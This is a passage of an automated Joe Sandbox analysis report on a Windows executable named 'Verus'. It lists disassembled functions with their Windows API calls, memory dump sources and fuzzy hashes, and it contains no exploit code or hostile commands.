lstrcatW.KERNEL32(00000000,004CA150,?,?,00000000,?,?,?,?,?,?,?,?,00000008,00000000,?), ref: 0045C6A3
lstrcpyW.KERNEL32(00000418,?,?,?,00000000,?,?,?,?,?,?,?,?,00000008,00000000,?), ref: 0045C6BC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 6b0a490c9d9ba91b6091dfff34fad7ff249a4bc40d9b732686f10218e025768f
Instruction ID: db7eee54bed76224c5980b72d47920095ad759135240e44cbefd3188cb1b14ff
Opcode Fuzzy Hash: 6b0a490c9d9ba91b6091dfff34fad7ff249a4bc40d9b732686f10218e025768f
Instruction Fuzzy Hash: E081C3B46043049FD714EF65D8C1E2BB7E9EB88704F00455EF8458B392DB39E905CB9A

Function 00471150 Relevance: 7.7, APIs: 5, Instructions: 162stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,00000000,00539FD8,74E2F770,00000000), ref: 00471189
lstrcatW.KERNEL32(?,?), ref: 0047119E
lstrcatW.KERNEL32(?,004CA150), ref: 004711AA
lstrcpyW.KERNEL32(?,?), ref: 00471204
lstrcpyW.KERNEL32(?,?), ref: 004712EA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: e3dcf604e450caf1c303068971537e08b0e31f6b3a53805f2d8a6cc70565d3cb
Instruction ID: c34c7ed4ad4351dc05c15ebcf73ced3537f27fe1f0bc8e0207fdd6139c6f0c02
Opcode Fuzzy Hash: e3dcf604e450caf1c303068971537e08b0e31f6b3a53805f2d8a6cc70565d3cb
Instruction Fuzzy Hash: 36519C35600212AFCB20EF69C4819AB77A5FF48354F11859EF949E7321D734EC45CBA9

Function 0045C0E0 Relevance: 7.6, APIs: 5, Instructions: 131stringtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0046EE90: lstrcmpW.KERNEL32(?,40000000,?,40000000,?,40000000,0045C32D,?,?), ref: 0046EEDA

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrcpyW.KERNEL32(?,?,?,?), ref: 0045C1CC
SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00000410), ref: 0045C1E4
lstrcpyW.KERNEL32(?,004C49AC), ref: 0045C211
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0045C21D
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0045C23D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FileTime$lstrcpy$DateInfoLocal_malloclstrcmp
String ID:
API String ID: 1312155787-0
Opcode ID: 21d76b1cfe53421a1f9cdedae5ee50c32f117d6f6f9656ba01c8481c5e17b71a
Instruction ID: 062cfb5a87b3b67437913883be53036ab5a5849bdff9a489afc5452bf5287e8f
Opcode Fuzzy Hash: 21d76b1cfe53421a1f9cdedae5ee50c32f117d6f6f9656ba01c8481c5e17b71a
Instruction Fuzzy Hash: 6C419FB1604301AFD324DF55C995F6BB7E9FBC8710F004A2EF58587792D678A804CB6A

Function 00446EF0 Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000001,00000001,?,004EDE74,0045B5C4,?,004EDE74), ref: 00446F5D
SetWindowPos.USER32(00000000,00000000,00000000,00000024,00000000,?,00000004,00000000,00000024,00000024,?,?,004EDE74,0045B5C4,?,004EDE74), ref: 00446FA6
InvalidateRect.USER32(?,00000024,00000001,00000000,00000024,00000024,?,?,004EDE74,0045B5C4,?,004EDE74), ref: 00446FB5
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004,?,?,?,004EDE74,0045B5C4,?,004EDE74), ref: 00447003
InvalidateRect.USER32(?,?,00000001,?,?,?,004EDE74,0045B5C4,?,004EDE74), ref: 0044701A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: InvalidateRect$Window
String ID:
API String ID: 2579585970-0
Opcode ID: 88549dfb463fcd1911a6aac35982accbbf278266a001a6fe859e1ecddad30355
Instruction ID: c90f11ed7abb4825fe7ce95f075c2c5b219abd58fc628e8d0722387382bf8058
Opcode Fuzzy Hash: 88549dfb463fcd1911a6aac35982accbbf278266a001a6fe859e1ecddad30355
Instruction Fuzzy Hash: 54419D71604705AFD724CF59D880D6BF7E9FBC8714F408A1EF58583254E731E8098BA6

Function 00446DB0 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000001,00000001), ref: 00446E1D
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00446E66
InvalidateRect.USER32(?,00000001,00000001), ref: 00446E75

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: InvalidateRect$Window
String ID:
API String ID: 2579585970-0
Opcode ID: f805decf3a083926608a81de46e980fdc385c6e6b410076ebb271a51a881e77b
Instruction ID: 6374e07cec7f6c347efbe4f54dd521f0bc868ad44df88ba0839ea4a17301884d
Opcode Fuzzy Hash: f805decf3a083926608a81de46e980fdc385c6e6b410076ebb271a51a881e77b
Instruction Fuzzy Hash: E2419D75604705AFE724CF59C880D6BB7E9FBC9700F508A1EF58683250EB31E805CBA6

Function 00479110 Relevance: 7.6, APIs: 6, Instructions: 87stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00479162
lstrlenW.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,000000FF), ref: 00479167
lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00479199
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 004791A0
lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 004791C3
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 004791CA

Part of subcall function 00477840: lstrlenW.KERNEL32(?,74DEE0B0,00000000,?,?,004791B8,?,?,?), ref: 0047784B
Part of subcall function 00477840: _wcsncpy.LIBCMT ref: 004778E9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$lstrcpy$_malloc_wcsncpy
String ID:
API String ID: 501654468-0
Opcode ID: 0e6786047af815fa6c9cda1f8f5d8fe7dbceb1c09765ff1bf0e590cdadf28900
Instruction ID: e06a0f6faeb358f604403c25a9681469243a75049b3c7496d62796bafefd0c4a
Opcode Fuzzy Hash: 0e6786047af815fa6c9cda1f8f5d8fe7dbceb1c09765ff1bf0e590cdadf28900
Instruction Fuzzy Hash: 012172B1504715AFD320DF14CC45AABB7ECEB88764F008A1EF89A87350C63899018BA5

Function 0042F220 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 0042F180: CloseHandle.KERNEL32(AD5E0258,?,?,-00000048,?,AD5E0258), ref: 0042F198
Part of subcall function 0042F180: lstrcpyW.KERNEL32(?,\\.\X:,?,?,-00000048,?,AD5E0258), ref: 0042F1B2
Part of subcall function 0042F180: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,?,-00000048,?,AD5E0258), ref: 0042F1D9

DeviceIoControl.KERNEL32(00000000,00041018,00000000,00000000,?,00000008,?,00000000), ref: 0042F283
CloseHandle.KERNEL32(00000000), ref: 0042F28E
CloseHandle.KERNEL32(00000000), ref: 0042F2A1
CloseHandle.KERNEL32(00000000,00000043), ref: 0042F2DE
CloseHandle.KERNEL32(00000000), ref: 0042F2F6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CloseHandle$ControlCreateDeviceFilelstrcpy
String ID:
API String ID: 661775664-0
Opcode ID: f3c1093acf5054d26758e5f58dde5b9754a895e4fd12e771a7aedc3bc979d0ee
Instruction ID: f7593733c9aae891053287330df216fdfe9da35db7e609fa0920d8046aca581b
Opcode Fuzzy Hash: f3c1093acf5054d26758e5f58dde5b9754a895e4fd12e771a7aedc3bc979d0ee
Instruction Fuzzy Hash: B821B9356057319AC221DE159C40B6FB7E4AF86B10FD506BBF88056240D729DA0A87FE

Function 00416AF0 Relevance: 7.6, APIs: 5, Instructions: 80stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416B0B

Part of subcall function 00415BD0: _memset.LIBCMT ref: 00415BF0
Part of subcall function 00415BD0: GetVersionExW.KERNEL32 ref: 00415C04

lstrlenW.KERNEL32(?), ref: 00416B9B
lstrcpynW.KERNEL32(?,?,00000104), ref: 00416BAD
lstrlenW.KERNEL32(?), ref: 00416BBD
lstrcpynW.KERNEL32(?,?,00000001), ref: 00416BC3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memsetlstrcpynlstrlen$Version
String ID:
API String ID: 1695601350-0
Opcode ID: 67077a69e2cd1eb8108c112d7cf9b0a11bc8c2b748b8c67000723a28fca5a714
Instruction ID: c22fcaf4766a7c561eeffd09dd487b862a1e94aa2851c6e83cb21f4040d2e11c
Opcode Fuzzy Hash: 67077a69e2cd1eb8108c112d7cf9b0a11bc8c2b748b8c67000723a28fca5a714
Instruction Fuzzy Hash: 782116B1605B048FD320DF2AD840967BBE8FF89744B10892EE59AC7710D775E9488B99

Function 00442BF0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 00442C42
FillRect.USER32(?,0000000F,00000000), ref: 00442C4F
GetSysColor.USER32(0000000F), ref: 00442C88
GetSysColor.USER32(0000000F), ref: 00442CB9
GetSysColor.USER32(00000010), ref: 00442CBE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Color$BrushFillRect
String ID:
API String ID: 2319354437-0
Opcode ID: 3e6c8e08c7ce1985601eed1d2761b097afa26757b1d773da4ccd75e7fbedb6e4
Instruction ID: 60322d5b64c0af85f50b16bec2d83c95f972bdf35b156c717a4b0bd1e443f80c
Opcode Fuzzy Hash: 3e6c8e08c7ce1985601eed1d2761b097afa26757b1d773da4ccd75e7fbedb6e4
Instruction Fuzzy Hash: C4316B715083019FD314DF64DA84F2BBBE9EB88724F40892EF49597380D774A908CFA6

Function 004502F0 Relevance: 7.6, APIs: 5, Instructions: 73threadCOMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0045032E
EnterCriticalSection.KERNEL32(0053A264), ref: 00450358
GetCurrentThreadId.KERNEL32 ref: 0045036C
UnhookWindowsHookEx.USER32(00000000), ref: 00450395
LeaveCriticalSection.KERNEL32(0053A264), ref: 004503DA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalSection$CallCurrentEnterHookLeaveProcThreadUnhookWindowWindows
String ID:
API String ID: 1449620483-0
Opcode ID: 1d6d8f042f6a7818081287bb6399c0dd980f318cac8b3f8053562e5b9186b1c0
Instruction ID: 26940984af760ec5b6b677298cde5a2d7087cf8454a2f0aa2afa0092a617c422
Opcode Fuzzy Hash: 1d6d8f042f6a7818081287bb6399c0dd980f318cac8b3f8053562e5b9186b1c0
Instruction Fuzzy Hash: 64218C751047419FD314DF64D954F2B77E4FB88B28F004A2DF89593391DB78A808CB6A

Function 00446760 Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00446775
SendMessageW.USER32 ref: 004467DE
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004467ED
SendMessageW.USER32(?,0000102B,00000000,?), ref: 00446809
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00446816

Part of subcall function 00465BA0: FindWindowExW.USER32(?,00000000,SysListView32,00000000), ref: 00465BBE
Part of subcall function 00465BA0: IsWindowVisible.USER32(00000000), ref: 00465BC3
Part of subcall function 00465BA0: FindWindowExW.USER32(?,00000000,ThumbnailVwExtWnd32,00000000), ref: 00465BD8
Part of subcall function 00465BA0: FindWindowExW.USER32(00000000,00000000,SysListView32,00000000), ref: 00465BE4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSendWindow$Find$FocusVisible
String ID:
API String ID: 1003623603-0
Opcode ID: 9985c9a53283d97b693158f5d8f7d2a1f6e6b5c77376e04073f6cfadd7710596
Instruction ID: 7b5921a6baf4375ac71ed7360a175bf17aeb29fa72b212e92379c3929ed13f7c
Opcode Fuzzy Hash: 9985c9a53283d97b693158f5d8f7d2a1f6e6b5c77376e04073f6cfadd7710596
Instruction Fuzzy Hash: 5F116DB1545310AFE360DF358C85B9BBAE4EBC9764F10092EF589D6281E37498418B9A

Function 004429A0 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004429C8
PtInRect.USER32(?), ref: 004429F4
PostMessageW.USER32(?,00008013,00000000,00000000), ref: 00442A1A
InvalidateRect.USER32(?,?,00000001), ref: 00442A32
InvalidateRect.USER32(?,?,00000001), ref: 00442A53

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Rect$Invalidate$ClientMessagePost
String ID:
API String ID: 3492398189-0
Opcode ID: 154f16d7930d2e2667ba40159f23c52acdb13b57142f8550d9013a5b3551af00
Instruction ID: 2c757a547912e3000d5dd24a743f3f40c2919eb182f5185871fc3ea657ef1c7c
Opcode Fuzzy Hash: 154f16d7930d2e2667ba40159f23c52acdb13b57142f8550d9013a5b3551af00
Instruction Fuzzy Hash: 02218175204701AFE324CF68DD94FA7B7E8EB88B10F40491EF595D6290D7B0E944CB65

Function 0044EBC0 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0044EBD9
lstrlenW.KERNEL32(?), ref: 0044EBE9
SetTextColor.GDI32(?,?), ref: 0044EBFF
DrawTextW.USER32(?,?,?,?,?), ref: 0044EC28
DrawTextW.USER32(?,?,000000FF,?,?), ref: 0044EC57

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Text$Drawlstrlen$Color
String ID:
API String ID: 2432876991-0
Opcode ID: bcc8afe93bbf674d2abdd62b8ddb1956a7789c0a7ba3575a183b749a81782548
Instruction ID: 8fa640f359b1fa6c1ff75482982c066cddc88ee0143fba0b36e50bae072ea57f
Opcode Fuzzy Hash: bcc8afe93bbf674d2abdd62b8ddb1956a7789c0a7ba3575a183b749a81782548
Instruction Fuzzy Hash: AF119071115315ABE214CB1ACC84E7BBBADFB893A1F20472AF4A1C3291DB68E8418775

Function 00416290 Relevance: 7.6, APIs: 5, Instructions: 58threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004162A8
GetCurrentThreadId.KERNEL32 ref: 004162B5
LeaveCriticalSection.KERNEL32(?,?,?), ref: 004162CF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
